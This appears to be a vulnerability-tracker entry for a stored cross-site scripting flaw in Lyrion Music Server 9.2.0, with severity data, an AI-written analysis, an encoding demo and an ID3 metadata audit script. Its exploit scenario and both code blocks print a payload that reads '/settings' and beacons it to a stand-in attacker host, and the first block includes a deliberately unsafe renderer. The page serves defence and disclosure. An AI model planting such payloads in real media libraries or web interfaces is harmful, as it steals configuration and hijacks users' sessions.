
Lyrion Music Server EUVD-2026-34831

CVE-2026-50232 · MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-05 · VulnCheck · GHSA-v3rr-mvqc-gmm2
5.1 (CVSS 4.0 · NVD)

Severity by source

NVD PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS Vector (NVD)

Attack Vector: Network
Attack Complexity: Low
Attack Requirements: None
Privileges Required: Low
User Interaction: Passive
Vulnerable System Impact (C / I / A): None / None / None
Subsequent System Impact (C / I / A): Low / Low / None
Safety (supplemental metric, the S: component of the vector): Not Defined

Lifecycle Timeline

Severity Changed
Jun 05, 2026 - 14:22 NVD
HIGH → MEDIUM
CVSS changed
Jun 05, 2026 - 14:22 NVD
7.2 (HIGH) → 5.1 (MEDIUM)
Analysis Generated
Jun 05, 2026 - 14:15 vuln.today

Description (CVE.org)

Lyrion Music Server 9.2.0 contains a stored cross-site scripting vulnerability that allows attackers to inject malicious scripts through media file metadata tags like GENRE, ARTIST, and ALBUM. Attackers can craft files with XSS payloads in metadata tags that execute in the web interface when users view track information or play files, enabling access to management functions and settings disclosure.

Analysis (AI)

Stored cross-site scripting in Lyrion Music Server 9.2.0 allows remote attackers to inject JavaScript payloads via media file metadata fields (GENRE, ARTIST, ALBUM) that execute when other users browse the web interface. The analysis was generated against the initial 7.2 (HIGH) rating; NVD has since published a CVSS 4.0 score of 5.1 (MEDIUM) whose vector places the confidentiality and integrity impact on the subsequent system (SC:L/SI:L), that is, the victim's browser session rather than the server itself. Successful exploitation can still reach management functions and disclose settings through that session. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Craft audio file with XSS in ID3 tags
Delivery: Deliver file to victim's library
Exploit: Server indexes poisoned metadata
Execution: User loads track or now-playing view
Persist: Script executes in web UI origin
Impact: Read settings and invoke management endpoints

Vulnerability Assessment (AI)

Exploitation: Exploitation requires that an audio file containing attacker-controlled metadata in GENRE, ARTIST, or ALBUM tags is indexed by a Lyrion Music Server 9.2.0 instance, and that a user subsequently views the track information page or plays the file through the web interface, so the trigger is a victim browser session rendering the poisoned entry. The NVD CVSS 4.0 vector records this as UI:P (passive user interaction), not UI:N, and rates the attacker as needing low privileges (PR:L). …
Risk Assessment: The vector this analysis was generated against (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N, a CVSS 3.1 vector that scores 7.2 and matches the initial HIGH rating in the timeline) treats the payload as plantable over the network with no authentication or user interaction, and uses a scope change to capture impact landing in the rendering browser. The NVD CVSS 4.0 vector that replaced it (AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N, 5.1 MEDIUM) is the better fit for a stored XSS: the server's own confidentiality, integrity and availability are untouched (VC:N/VI:N/VA:N), the low confidentiality and integrity impact falls on the subsequent system, the victim's browser session (SC:L/SI:L), and UI:P records that the impact only materializes when an administrator or user views the poisoned track. …
Exploit Scenario: An attacker shares or seeds an MP3/FLAC file whose ARTIST or ALBUM tag contains a payload such as <script>fetch('/settings').then(r=>r.text()).then(x=>navigator.sendBeacon('//attacker',x))</script>; the victim adds the file to their Lyrion library (directly, via a shared folder, or via a third-party download). When the owner or any authenticated user opens the track view or now-playing screen, the script executes in the server's web-UI origin and exfiltrates configuration or invokes management endpoints on the attacker's behalf.
Remediation: No vendor-released patch was identified in the supplied references at the time of analysis, so operators should monitor the Lyrion Music Server project (LMS Community) for a fixed release later than 9.2.0 and apply it once published; consult the VulnCheck advisory (https://www.vulncheck.com/advisories/lyrion-music-server-stored-xss-via-metadata-tags) and the Zero Science Lab advisory (https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5990.php) for ongoing updates. …
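The rendering step the exploit scenario above depends on, as an added example in JavaScript that is not Lyrion Music Server's own code: the same track object rendered once with raw concatenation and once with context-specific output encoding. The markup shape, the `/browse?genre=` link and the track object are constructed for the demo; the ARTIST value is the payload quoted in the scenario.

```javascript
// Added example, not Lyrion Music Server code: the same track rendered with
// and without output encoding. The track object is constructed for the demo;
// its ARTIST value is the payload from the exploit scenario on this page.
const poisonedTrack = {
  title: 'Track 01',
  artist: "<script>fetch('/settings').then(r=>r.text()).then(x=>navigator.sendBeacon('//attacker',x))</script>",
  album: '" onmouseover="alert(1)',      // breaks out of a double-quoted attribute
  genre: 'Drum & Bass',                  // legitimate value that still needs encoding
};

// VULNERABLE: tag values are concatenated straight into markup (what a UI that
// assigns the result to innerHTML, or a server template without escaping,
// would produce). Every tag value is interpreted as HTML.
function renderTrackUnsafe(t) {
  return `<div class="track" title="${t.album}">` +
    `<span class="artist">${t.artist}</span> - <span class="title">${t.title}</span> ` +
    `<a href="/browse?genre=${t.genre}">${t.genre}</a></div>`;
}

// Entity-encode the five characters that matter in element text and in
// double-quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// HARDENED: each value is encoded for the context it lands in. Text nodes and
// attribute values get HTML escaping; the query-string value is URL-encoded
// first and then HTML-escaped, because it sits inside an attribute.
function renderTrackSafe(t) {
  return `<div class="track" title="${escapeHtml(t.album)}">` +
    `<span class="artist">${escapeHtml(t.artist)}</span> - <span class="title">${escapeHtml(t.title)}</span> ` +
    `<a href="/browse?genre=${escapeHtml(encodeURIComponent(t.genre))}">${escapeHtml(t.genre)}</a></div>`;
}

console.log(renderTrackUnsafe(poisonedTrack));
console.log(renderTrackSafe(poisonedTrack));
```

Two points worth noting when reproducing the scenario: a bare `<script>` element inserted through `innerHTML` is not executed by browsers, so a client-side UI is hit through attribute breakouts (the ALBUM value above) or handlers such as `<img onerror=...>`, while server-rendered markup runs the `<script>` directly; and escaping alone is not enough for the genre link, which needs `encodeURIComponent` before the HTML escape or a legitimate `Drum & Bass` tag corrupts the query string.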

Recommended Action (AI)

Within 24 hours: audit Lyrion Music Server 9.2.0 libraries for suspicious media file metadata in the GENRE, ARTIST, and ALBUM fields (HTML tags, event-handler attributes, javascript: URIs), and restrict write access to the folders the server scans (shared folders, download targets) to trusted administrators only. …
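One way to perform the metadata audit recommended above, and to see what the server indexes at the "poisoned metadata" step of the attack chain, as an added example in JavaScript (Node.js) that is not Lyrion Music Server's own code: a small ID3v2 text-frame parser followed by an indicator scan. Assumptions: ID3v2.3 and v2.4 tags only (no unsynchronisation, no extended header), text encodings 0 and 3 only, and the indicator regexes are a starting point rather than a complete detector. The two tag buffers at the bottom are constructed for the demo; FLAC/Vorbis comments are not parsed here.

```javascript
// Added example, not Lyrion Music Server code: parse ID3v2 text frames and
// flag script-like values, as an audit pass over a library would. The tag
// buffers built at the bottom are constructed for the demo, not real files.
// Assumptions: ID3v2.3 (big-endian frame sizes) and ID3v2.4 (synchsafe frame
// sizes) only; encodings 0 (ISO-8859-1) and 3 (UTF-8) only; no unsynchronisation.

// Synchsafe integers: 4 bytes carrying 7 bits each (tag size in all versions,
// frame sizes in v2.4).
function readSynchsafe(buf, off) {
  return ((buf[off] & 0x7f) << 21) | ((buf[off + 1] & 0x7f) << 14) |
         ((buf[off + 2] & 0x7f) << 7) | (buf[off + 3] & 0x7f);
}
function writeSynchsafe(n) {
  return Buffer.from([(n >> 21) & 0x7f, (n >> 14) & 0x7f, (n >> 7) & 0x7f, n & 0x7f]);
}

// Return { frameId: text } for every T*** frame. Frames in an encoding the
// parser does not handle are reported as null rather than silently dropped,
// so an audit still sees them.
function parseId3TextFrames(buf) {
  if (buf.length < 10 || buf.toString('latin1', 0, 3) !== 'ID3') return {};
  const major = buf[3];
  if (major !== 3 && major !== 4) return {};
  const tagEnd = Math.min(buf.length, 10 + readSynchsafe(buf, 6));
  const frames = {};
  let off = 10;
  while (off + 10 <= tagEnd) {
    const id = buf.toString('latin1', off, off + 4);
    if (id === '\0\0\0\0') break;                     // padding reached
    const size = major === 4 ? readSynchsafe(buf, off + 4) : buf.readUInt32BE(off + 4);
    const body = buf.subarray(off + 10, Math.min(tagEnd, off + 10 + size));
    if (id[0] === 'T' && body.length > 0) {
      const enc = body[0];
      const text = body.subarray(1);
      if (enc === 0) frames[id] = text.toString('latin1').replace(/\0+$/, '');
      else if (enc === 3) frames[id] = text.toString('utf8').replace(/\0+$/, '');
      else frames[id] = null;                         // UTF-16 variants: not decoded here
    }
    off += 10 + size;
  }
  return frames;
}

// Indicators of HTML or script in a value that should be plain text. A hit is
// a reason for a human look, not proof of an attack.
const INDICATORS = [
  { name: 'html-tag',       re: /<\/?[a-z!?]/i },
  { name: 'event-handler',  re: /\bon[a-z]+\s*=/i },
  { name: 'javascript-uri', re: /javascript\s*:/i },
  { name: 'html-entity',    re: /&#x?[0-9a-f]+;|&[a-z]+;/i },
];

function auditTags(frames) {
  const findings = [];
  for (const [frame, value] of Object.entries(frames)) {
    if (value === null) { findings.push({ frame, indicator: 'unhandled-encoding' }); continue; }
    for (const { name, re } of INDICATORS) {
      if (re.test(value)) findings.push({ frame, indicator: name, sample: value.slice(0, 60) });
    }
  }
  return findings;
}

function auditFile(buf) {
  return auditTags(parseId3TextFrames(buf));
}

// --- Constructed sample files (demo only) ---
// v2.4 writes UTF-8 (encoding 3) with synchsafe frame sizes; v2.3 writes
// ISO-8859-1 (encoding 0) with plain big-endian sizes.
function buildId3(major, frames) {
  const enc = major === 4 ? 3 : 0;
  const parts = [];
  for (const [id, value] of Object.entries(frames)) {
    const body = Buffer.concat([Buffer.from([enc]), Buffer.from(value, enc === 3 ? 'utf8' : 'latin1')]);
    let size;
    if (major === 4) size = writeSynchsafe(body.length);
    else { size = Buffer.alloc(4); size.writeUInt32BE(body.length); }
    parts.push(Buffer.from(id, 'latin1'), size, Buffer.from([0, 0]), body);
  }
  const frameData = Buffer.concat(parts);
  const header = Buffer.concat([Buffer.from('ID3', 'latin1'), Buffer.from([major, 0, 0]), writeSynchsafe(frameData.length)]);
  return Buffer.concat([header, frameData, Buffer.alloc(16, 0xff)]);   // 0xff bytes stand in for audio
}

// Payload from the exploit scenario on this page in ARTIST (TPE1), plus an
// attribute-breakout string in ALBUM (TALB).
const PAYLOAD = "<script>fetch('/settings').then(r=>r.text()).then(x=>navigator.sendBeacon('//attacker',x))</script>";
const poisonedMp3 = buildId3(4, { TIT2: 'Track 01', TPE1: PAYLOAD, TALB: '" onmouseover="alert(1)', TCON: 'Rock' });
const cleanMp3 = buildId3(3, { TIT2: 'Song', TPE1: 'Someone', TALB: 'Album', TCON: 'Drum & Bass' });

console.log('clean:', auditFile(cleanMp3));
console.log('poisoned:', auditFile(poisonedMp3));
```

Run it over real files by replacing the constructed buffers with `fs.readFileSync(path)`; the parser only reads the tag at the start of the file, so it is cheap to run across a whole library. A `Drum & Bass` genre produces no finding because the entity indicator requires a terminating semicolon, while the ALBUM breakout is caught by the event-handler pattern even though it contains no `<` at all.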
